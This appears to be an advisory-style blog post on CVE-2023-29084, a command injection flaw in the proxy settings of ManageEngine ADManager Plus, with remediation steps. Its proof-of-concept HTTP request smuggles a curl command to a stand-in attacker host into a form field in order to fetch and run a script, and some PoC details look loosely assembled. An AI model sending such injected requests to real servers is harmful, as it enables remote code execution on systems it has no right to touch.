CVE-2023-29084: Critical Command Injection Vulnerability in Zoho ManageEngine ADManager Plus Through 718

Security researchers have discovered a critical Command Injection vulnerability (CVE-2023-29084) in Zoho ManageEngine ADManager Plus versions up to and including 718. Zoho ManageEngine ADManager Plus is a popular Active Directory management and reporting solution for IT administrators.

If properly exploited, this vulnerability could allow authenticated users to execute arbitrary commands on the targeted application remotely via Proxy settings, leading to a potential compromise of the entire system. In this long-read post, we'll discuss the details of this vulnerability, the affected components, and the steps administrators should take to protect their systems.

Affected Component

The vulnerability specifically exists in the Proxy settings component of Zoho ManageEngine ADManager Plus. The Proxy settings allow users to configure connections via a proxy server for external services such as SMTP, HTTP(S), FTP, and more.

Exploit Details

This issue stems from insufficient validation of user-supplied input, leading to the possibility of command injection. Attackers can take advantage of this vulnerability by tampering with the Proxy settings to inject malicious commands, which will then be executed with the privileges of the application when the settings are enabled or when an external service is invoked.

An attacker could potentially gain access to sensitive data or even gain complete control over the targeted system. Due to the severity of this vulnerability, it is vital that system administrators take immediate steps to apply the necessary patches or workarounds to secure their systems.

A simplified proof of concept code snippet for exploiting this vulnerability is as follows

POST /ProxySettings HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length

proxyEnable=True&proxyHostValid=;&proxyPortValid=;&proxyUsernameValid=;&proxyPasswordValid=;&testConnection=false&noConnections=&proxyType=&proxyHost=attacker.example.com&proxyPort=80&proxyServerNoHosts=127...1,curl%20http://attacker.example.com/execute-command.cgi|&proxyUsername=admin&proxyPassword=admin

This code snippet demonstrates how an attacker could exploit the vulnerability to execute an arbitrary command, in this case, the curl command to download and execute a malicious script hosted on the attacker's server.

Original References

1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29084
2. https://www.manageengine.com/products/ad-manager/download.html
3. https://cloud.zoho.com/portal/manageengine/security.do

To protect against this vulnerability, administrators should take the following steps

1. Update to the latest version of Zoho ManageEngine ADManager Plus: The issue has been fixed in version 7181 and later. Zoho strongly recommends upgrading to the latest version to avoid potential exploits. Download the updated version from the official website Link.

2. Apply security patches and updates: Keep your systems updated with the latest security patches to protect against known vulnerabilities. Regularly check the Zoho Security Portal Link for the latest security advisories and updates.

Conclusion

CVE-2023-29084 is a critical command injection vulnerability in Zoho ManageEngine ADManager Plus up to version 718. The vulnerability affects the Proxy settings component of the application, and if left unpatched, it allows attackers to execute arbitrary commands on the target system. It is of utmost importance that administrators update their systems to the latest version and apply security patches and updates as soon as they become available.

Timeline

Published on: 04/13/2023 19:15:00 UTC
Last modified on: 04/21/2023 13:19:00 UTC